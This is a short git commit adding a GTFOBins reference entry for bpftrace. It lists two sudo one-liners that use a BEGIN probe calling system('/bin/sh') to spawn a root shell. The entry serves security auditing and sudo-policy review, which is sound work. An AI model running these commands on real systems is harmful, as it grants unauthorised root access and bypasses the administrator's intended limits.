Add bpftrace sudo shell

This commit is contained in:
Andrea Cardaci 2020-01-03 14:02:32 +01:00
parent a9c3dc58fa
commit 6b4c7c12c9

9
_gtfobins/bpftrace.md Normal file
View File

@ -0,0 +1,9 @@
---
functions:
sudo:
- code: sudo bpftrace -e 'BEGIN {system("/bin/sh")}'
- code: |
TF=$(mktemp)
echo 'BEGIN {system("/bin/sh")}' >$TF
sudo bpftrace $TF
---